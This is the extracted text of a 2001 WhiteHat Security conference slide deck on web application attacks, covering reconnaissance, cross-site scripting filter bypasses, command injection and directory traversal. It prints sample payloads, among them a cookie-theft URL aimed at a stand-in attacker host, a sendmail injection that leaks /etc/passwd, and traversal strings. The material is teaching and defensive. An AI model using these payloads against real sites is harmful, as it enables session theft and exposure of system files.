Escolar Documentos
Profissional Documentos
Cultura Documentos
Copyright 2001 WhiteHat Security All Rights Reserved
Topics
2001 © WhiteHat
Topics
2001 © WhiteHat
But Why!?
•
Easiest way to compromise hosts, networks and
•
users.
•
Widely deployed.
•
No Logs! (POST Request payload)
•
Incredibly hard to defend against or detect.
•
Most don’t think of locking down web
applications.
•
Intrusion Detection is a joke.
•
Firewall? What firewall? I don’t see no any
firewall.
•
Encrypted transport layer does nothing.
•
Best of all, no one is looking anyway.
2001 © WhiteHat
How much easier can it
get!?
Oh right.
Unicode
2001 © WhiteHat
Web Application
The Simple Definition
2001 © WhiteHat
Web Security Layers
2001 © WhiteHat
The Implementation
E-Commerce Entertainment
Shopping Message Boards
Auctions WebMail
Banking Guest Books
Stock Trading Voting Polls
2001 © WhiteHat
Firewall
2001 © WhiteHat Security, Inc.
2001 © WhiteHat Security, Inc.
Common Web Application
Security Mistakes
2001 © WhiteHat
Trusting Client-Side Data
2001 © WhiteHat
Trusting Client-Side Data
Numbers
<input type=hidden value=2149.37>
2149.00
Now On Sale!
2001 © WhiteHat
Trusting Client-Side Data
Path
http://foo.com/cgi?val=string&file=/html/name.
db
Or better yet…
http://www.foo.com/cgi?string=root&file=../../../
../../etc/passwd
2001 © WhiteHat Security, Inc.
Unescaped Special Characters
Check for:
Unescaped special characters
within input strings
2001 © WhiteHat
HTML Character Filtering
Proper handling of special characters
2001 © WhiteHat Security, Inc.
More mistakes…
2001 © WhiteHat
Information & Discovery
Spidering/Site Crawling
Identifiable Characteristics
Errors and Response Codes
File/Application Enumeration
Network Reconnaissance
2001 © WhiteHat Security, Inc.
Spidering/Site Crawling
Tools: WGET
http://www.gnu.org/software/wget/wget.html
2001 © WhiteHat Security, Inc.
Identifiable Characteristics
Comment Lines
URL Extensions
Meta Tags
Cookies
Client-Side scripting languages
2001 © WhiteHat Security, Inc.
Error and Response Codes
Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent
2001 © WhiteHat Security, Inc.
File/Application Enumeration
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
2001 © WhiteHat Security, Inc.
Network Reconnaissance
WHOIS
ARIN
http://www.arin.net/whois/index.html
Port Scan (Nmap)
http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING)http://www.hping.org/
NSLookup/ Reverse DNS
DNS Zone Transfer (DIG)
OS Finger Printing (Nmap or Xprobe)
2001 © WhiteHat Security, Inc.
Input Manipulation Parameter Tampering
"Twiddling Bits."
Cross-Site Scripting
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers
2001 © WhiteHat Security, Inc.
Cross-Site Scripting
Bad name given to a dangerous security
issue
2001 © WhiteHat Security, Inc.
Client-Side Scripting
Languages
2001 © WhiteHat Security, Inc.
Accessing the DOM & Outside the DOM
2001 © WhiteHat Security, Inc.
Authentication/Authorization
“Hand in the cookie jar.”
www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
2001 © WhiteHat Security, Inc.
The Scenarios
2001 © WhiteHat Security, Inc.
CSS Danger
“The Remote Launch Pad.”
2001 © WhiteHat Security, Inc.
Dangerous Attributes
“Attributes Bad”
STYLE
SRC
HREF
TYPE
2001 © WhiteHat Security, Inc.
Filter Bypassing
"JavaScript is a Cockroach"
Submit all the raw HTML tags you can find, and
then
view the output results.
Exploit:
<SCRIPT>alert('JavaScript
Executed');</SCRIPT>
2001 © WhiteHat Security, Inc.
SRCing JavaScript Protocol
Description: The JavaScript protocol will execute the
expression entered after the colon. Netscape Tested.
Further Information:
Any HTML tag with a SRC attribute will execute this script on
page load or on link activation.
Exploit:
<IMG SRC="javasc	ript:alert('JavaScript Executed');">
Replacement of entities \10 - \11 - \12 - \13 will also succeed.
Hex instead of Decimal HTML entities will also bypass input filters and execute.
Solution:Filter these entities within the string then do your further pattern
matching
2001 © WhiteHat Security, Inc.
AND CURLY
Description:
Obscure Netscape JavaScript execution line. Exact
syntax is
needed to execute.
Exploit:
<IMG SRC="&{alert('JavaScript Executed')};">
Solution:
<IMG SRC="XXalert('JavaScript Executed')};">
or something similar will nullify the problem.
2001 © WhiteHat Security, Inc.
Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.
Exploit:
<style TYPE="text/javascript">JS EXPRESSION</style>
Solution: Replace the "javascript" string with "java_script" and all should be
fine.
Solution: Again, filter and replace the "@import" and the "javascript:" just to
be safe. 2001 © WhiteHat Security, Inc.
Using CSS
Click to Execute
User must click on a link to execute the script.
(Search Fields, 404 Errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert(‘JavaScript
Launched’);</SCRIPT>
Mass Injection
All user viewing the page execute the script.
(Guest Books, Message Boards)
Message <SCRIPT>alert(‘JavaScript
Launched’);</SCRIPT>
2001 © WhiteHat Security, Inc.
Using CSS
Directed Injection
Soon as user load the page, script executes.
(WebMail, HTML Mail, Messaging)
<LAYER SRC=“javascript.js”></LAYER>
2001 © WhiteHat Security, Inc.
Twiddling Bits
OS Commands
Meta Characters
Path/Directory Traversal
2001 © WhiteHat Security, Inc.
Power of the Semi-Colon
piping input to the command line.
OS Commands
http://foo.com/app.cgi?email=none@foo.com
Append:
http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/p
asswd
Piping:
http://foo.com/app.cgi?email=none@foo.com+|+less
Re-Direct:
http://foo.com/app.cgi?email=none@foo.com+>+/
2001 © WhiteHat Security, Inc.
Power of Special Characters
piping input to the command line.
Meta Characters
http://foo.com/app.cgi?list=file.txt
Altered:
http://foo.com/app.cgi?list=*
2001 © WhiteHat Security, Inc.
Power of the Dots and Slashes
piping input to the command line.
DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passw
d
URL Encode
http://www.foo.com/cgi?value=%46%72%68%86
Null Characters
http://www.foo.com/cgi?value=file%00.html
More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.
2001 © WhiteHat Security, Inc.
More bits…
2001 © WhiteHat Security, Inc.
System Mis-Configurations
“patches, patches, and more patches…"
Vendor Patches
Default Accounts
Check:
Web Server permission by directory browsing
Software version from Discovery
Known default accounts in commercial
platforms
BugTraq
Anonymous FTP open on Web Server
2001 © WhiteHat Security, Inc.
Other Dirty Tricks
“Abuse can be far more time consuming, costly and
dangerous”
2001 © WhiteHat
Other Dirty Tricks
“Abuse can be far more time consuming, costly and
dangerous”
2001 © WhiteHat
Thank You
BlackHat and Attendees
Questions?
Jeremiah Grossman
jeremiah@whitehatsec.com
WhiteHat Security
All presentation updates will be available on
www.whitehatsec.com
2001 © WhiteHat Security, Inc.